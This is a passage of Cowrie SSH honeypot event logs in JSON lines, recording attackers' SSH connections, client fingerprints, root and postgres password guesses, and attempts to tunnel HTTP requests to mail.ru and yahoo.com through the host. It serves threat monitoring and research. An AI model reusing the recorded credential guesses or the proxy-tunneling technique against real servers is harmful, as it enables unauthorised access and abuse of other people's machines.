h-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:39.894850Z","src_ip":"77.83.207.83","session":"0f5c9484f1d1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:40.146605Z","src_ip":"77.83.207.83","session":"0f5c9484f1d1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":4478,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:4478","sensor":"my-vps","timestamp":"2025-08-31T03:53:40.198166Z","session":"0f5c9484f1d1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:40.249349Z","src_ip":"77.83.207.83","session":"0f5c9484f1d1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":18866,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:18866","sensor":"my-vps","timestamp":"2025-08-31T03:53:40.393013Z","session":"0f5c9484f1d1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:40.443480Z","src_ip":"77.83.207.83","session":"0f5c9484f1d1"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:40.529445Z","src_ip":"34.14.223.46","session":"224cfbe32c73"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":32108,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:32108","sensor":"my-vps","timestamp":"2025-08-31T03:53:40.584913Z","session":"0f5c9484f1d1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:40.635431Z","src_ip":"77.83.207.83","session":"0f5c9484f1d1"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:40.686808Z","src_ip":"77.83.207.83","session":"0f5c9484f1d1"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":45072,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b2887c70855","protocol":"ssh","message":"New connection: 77.83.207.83:45072 (1.2.3.4:22) [session: 3b2887c70855]","sensor":"my-vps","timestamp":"2025-08-31T03:53:40.735881Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:40.737003Z","src_ip":"77.83.207.83","session":"3b2887c70855"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:40.786934Z","src_ip":"77.83.207.83","session":"3b2887c70855"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55598,"dst_ip":"1.2.3.4","dst_port":22,"session":"79055abbc367","protocol":"ssh","message":"New connection: 212.227.235.229:55598 (1.2.3.4:22) [session: 79055abbc367]","sensor":"my-vps","timestamp":"2025-08-31T03:53:41.012116Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:41.022611Z","src_ip":"212.227.235.229","session":"79055abbc367"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:41.036762Z","src_ip":"77.83.207.83","session":"3b2887c70855"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":25799,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:25799","sensor":"my-vps","timestamp":"2025-08-31T03:53:41.087499Z","session":"3b2887c70855"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:41.138510Z","src_ip":"77.83.207.83","session":"3b2887c70855"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":15255,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:15255","sensor":"my-vps","timestamp":"2025-08-31T03:53:41.280475Z","session":"3b2887c70855"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:41.330680Z","src_ip":"77.83.207.83","session":"3b2887c70855"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32878,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2130d27f754","protocol":"ssh","message":"New connection: 212.227.235.229:32878 (1.2.3.4:22) [session: e2130d27f754]","sensor":"my-vps","timestamp":"2025-08-31T03:53:41.444136Z"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":5867,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:5867","sensor":"my-vps","timestamp":"2025-08-31T03:53:41.472438Z","session":"3b2887c70855"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:41.522486Z","src_ip":"77.83.207.83","session":"3b2887c70855"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:41.573348Z","src_ip":"77.83.207.83","session":"3b2887c70855"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":45163,"dst_ip":"1.2.3.4","dst_port":22,"session":"df4c117ab070","protocol":"ssh","message":"New connection: 77.83.207.83:45163 (1.2.3.4:22) [session: df4c117ab070]","sensor":"my-vps","timestamp":"2025-08-31T03:53:41.623663Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:41.624339Z","src_ip":"77.83.207.83","session":"df4c117ab070"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:53:41.644570Z","src_ip":"212.227.235.229","session":"79055abbc367"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:41.676284Z","src_ip":"77.83.207.83","session":"df4c117ab070"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:41.934950Z","src_ip":"77.83.207.83","session":"df4c117ab070"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":9082,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:9082","sensor":"my-vps","timestamp":"2025-08-31T03:53:41.987777Z","session":"df4c117ab070"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:42.039894Z","src_ip":"77.83.207.83","session":"df4c117ab070"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":31885,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:31885","sensor":"my-vps","timestamp":"2025-08-31T03:53:42.186263Z","session":"df4c117ab070"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:42.238829Z","src_ip":"77.83.207.83","session":"df4c117ab070"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":1831,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:1831","sensor":"my-vps","timestamp":"2025-08-31T03:53:42.386218Z","session":"df4c117ab070"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:42.438240Z","src_ip":"77.83.207.83","session":"df4c117ab070"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:42.491238Z","src_ip":"77.83.207.83","session":"df4c117ab070"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":45248,"dst_ip":"1.2.3.4","dst_port":22,"session":"df4bfd860727","protocol":"ssh","message":"New connection: 77.83.207.83:45248 (1.2.3.4:22) [session: df4bfd860727]","sensor":"my-vps","timestamp":"2025-08-31T03:53:42.540537Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:42.550840Z","src_ip":"77.83.207.83","session":"df4bfd860727"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:42.590747Z","src_ip":"77.83.207.83","session":"df4bfd860727"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:42.840038Z","src_ip":"77.83.207.83","session":"df4bfd860727"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"12","message":"login attempt [postgres/12] failed","sensor":"my-vps","timestamp":"2025-08-31T03:53:42.873514Z","src_ip":"212.227.235.229","session":"79055abbc367"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":23416,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:23416","sensor":"my-vps","timestamp":"2025-08-31T03:53:42.890998Z","session":"df4bfd860727"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51830,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c05616b5148","protocol":"ssh","message":"New connection: 212.227.235.229:51830 (1.2.3.4:22) [session: 1c05616b5148]","sensor":"my-vps","timestamp":"2025-08-31T03:53:42.926760Z"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:42.941035Z","src_ip":"77.83.207.83","session":"df4bfd860727"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":22238,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:22238","sensor":"my-vps","timestamp":"2025-08-31T03:53:43.096537Z","session":"df4bfd860727"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:43.146768Z","src_ip":"77.83.207.83","session":"df4bfd860727"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":773,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:773","sensor":"my-vps","timestamp":"2025-08-31T03:53:43.288432Z","session":"df4bfd860727"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:43.338711Z","src_ip":"77.83.207.83","session":"df4bfd860727"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:43.389872Z","src_ip":"77.83.207.83","session":"df4bfd860727"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":45345,"dst_ip":"1.2.3.4","dst_port":22,"session":"bc3c4a6b557b","protocol":"ssh","message":"New connection: 77.83.207.83:45345 (1.2.3.4:22) [session: bc3c4a6b557b]","sensor":"my-vps","timestamp":"2025-08-31T03:53:43.440388Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:43.441250Z","src_ip":"77.83.207.83","session":"bc3c4a6b557b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:43.493095Z","src_ip":"77.83.207.83","session":"bc3c4a6b557b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:53:43.687947Z","src_ip":"212.227.235.229","session":"1c05616b5148"}
